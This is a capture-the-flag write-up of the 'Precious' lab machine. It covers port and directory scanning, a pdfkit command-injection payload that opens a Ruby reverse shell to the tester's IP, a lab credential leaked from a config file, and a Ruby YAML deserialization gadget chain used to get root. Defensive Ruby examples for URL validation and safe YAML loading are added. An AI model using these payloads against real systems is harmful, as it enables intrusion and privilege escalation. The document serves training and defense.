Recon

  • Host name

    • http://precious.htb
    • echo "10.10.11.189 precious.htb" | sudo tee -a /etc/hosts
  • Rustscan: rustscan -a 10.10.11.189

Open 10.10.11.189:22
Open 10.10.11.189:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 13:48 EST
Initiating Ping Scan at 13:48
Scanning 10.10.11.189 [2 ports]
Completed Ping Scan at 13:48, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:48
Completed Parallel DNS resolution of 1 host. at 13:48, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:48
Scanning 10.10.11.189 [2 ports]
Discovered open port 22/tcp on 10.10.11.189
Discovered open port 80/tcp on 10.10.11.189
Completed Connect Scan at 13:48, 0.33s elapsed (2 total ports)
Nmap scan report for 10.10.11.189
Host is up, received syn-ack (0.48s latency).
Scanned at 2022-12-17 13:48:42 EST for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

  • Directory brute force: ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://precious.htb/FUZZ (no results)
  • VHOSTs: gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u precious.htb (no results)

Next Step


Since I did not find any subdomains or other pages on the web server, I decided to look at the main page for a vulnerability. I began by spinning up a PHP web server with the php -S 0.0.0.0:80 command. I then created a simple HTML page containing some text and converted it to a PDF using the online PDF converter on http://precious.htb. Once I had a PDF that the web server had generated, I ran exiftool ngveoebbpujxmgb2pxfbmu5p3cr7ddg3.pdf to see what had produced the document.

ExifTool Version Number         : 12.52
File Name                       : ngveoebbpujxmgb2pxfbmu5p3cr7ddg3.pdf
Directory                       : .
File Size                       : 4.6 kB
File Modification Date/Time     : 2022:12:18 17:56:17-05:00
File Access Date/Time           : 2022:12:18 17:56:17-05:00
File Inode Change Date/Time     : 2022:12:18 17:56:18-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

Once I saw that the PDF had been created by pdfkit v0.8.6, I knew I could research whether there were any CVEs for this particular PDF generator. After a quick search I found a GitHub repository that discussed the CVE. The repository had a payload that could simply be pasted into the form on the target web page to create a reverse shell on the target server; all I had to do was replace their IP address with mine and start pwncat.

Payload = http://10.10.14.148/?name=%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.148",4444))'`

pwncat -l 4444 --self-inject /bin/bash:10.10.14.148:4445

I then had a reverse shell on the target system.
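As an added defensive example (not code from this write-up or from pdfkit): the payload above only works because the user-supplied URL reaches the converter's shell command with its backticks and spaces intact. A converter front end can refuse anything that is not a plain http(s) URL built solely from RFC 3986 characters; the function and sample URLs below are my own.

```ruby
require 'uri'

# Characters RFC 3986 permits anywhere in a URI. A backtick or a space is not
# among them, so a URL carrying the write-up's injection shape fails this test
# before it can reach a shell-executed converter command.
URI_CHARS = /\A[A-Za-z0-9\-._~:\/?#\[\]@!$&'()*+,;=%]+\z/

# Returns the normalised URL string if the input is a plain http(s) URL made
# only of URI characters, otherwise nil. The caller refuses to convert on nil.
def safe_pdf_source(raw)
  return nil unless raw.is_a?(String) && raw.match?(URI_CHARS)
  uri = URI.parse(raw)
  # Block file://, javascript: and similar schemes the converter might follow.
  return nil unless %w[http https].include?(uri.scheme)
  return nil if uri.host.nil? || uri.host.empty?
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Constructed inputs: a normal page, a URL shaped like the write-up's payload
# (backtick and space inside the query string; a harmless command stands in),
# and a local-file scheme.
GOOD_URL = 'http://example.com/report?id=42'
BAD_URL  = 'http://example.com/?name=%20` id `'
FILE_URL = 'file:///etc/passwd'
```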


Privilege Escalation


The first thing I did on this machine was go through the folders in the ruby user's home directory. After looking through all of the directories I found a file called config in the .bundle directory. The config file contained the following username and password: henry:Q3c1AqGHtoI0aXAYFH. With these credentials I SSHed into the precious.htb machine. Now that I was the henry user, I got the user flag by running cat /home/henry/user.txt.

Now that I had escalated my privileges to the henry user, I ran sudo -l and saw that this user could only run the /opt/update_dependencies.rb script. Once I had discovered this file, I looked at what it contained. Reading the script's source, I saw that it imported a YAML library to parse a YAML file. Armed with this information I looked up vulnerabilities affecting YAML parsers and discovered a YAML deserialization vulnerability in the Ruby YAML library.

YAML PoC

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: PLACE_CMD_HERE
         method_id: :resolve

When you put this inside the YAML file that the Ruby script opens, whatever command replaces the PLACE_CMD_HERE text runs as root. Using this, I put /bin/bash as the command to run, and when I ran the Ruby script as root it dropped me into an interactive bash shell. Now that I was root I ran cat /root/root.txt to get the root flag.
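As an added example from the defender's side (not the write-up's own code and not the script on the box): the gadget chain above only works because the script lets the parser instantiate arbitrary Ruby classes from !ruby/object tags. Loading the dependency file with YAML.safe_load and then validating its shape rejects such documents while still accepting a plain list of gem versions; the file contents and function name below are constructed for this example.

```ruby
require 'yaml'

# Constructed sample: the kind of dependency list an update script is meant to read.
BENIGN_YAML = <<~YAML
  ---
  - rails: "6.1.4"
  - nokogiri: "1.12.5"
YAML

# Constructed sample: a file that smuggles a Ruby object tag. Only the tag is
# needed to show the rejection; no gadget chain is included.
TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Installer
    i: x
YAML

# Parse the way a root-run update script should: no class instantiation, no
# symbols, no aliases, then check the data has the expected shape.
# Returns [:ok, data] or [:rejected, message].
def load_dependencies(text)
  data = YAML.safe_load(text, permitted_classes: [], permitted_symbols: [], aliases: false)
  return [:rejected, 'expected a list of name => version pairs'] unless data.is_a?(Array)
  data.each do |entry|
    return [:rejected, "bad entry: #{entry.inspect}"] unless entry.is_a?(Hash) && entry.size == 1
    name, version = entry.first
    return [:rejected, "bad entry: #{entry.inspect}"] unless name.is_a?(String) && version.is_a?(String)
  end
  [:ok, data]
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError => e
  # safe_load raises DisallowedClass as soon as it meets !ruby/object:Gem::Installer,
  # so nothing from the tagged document is ever constructed.
  [:rejected, e.message]
end
```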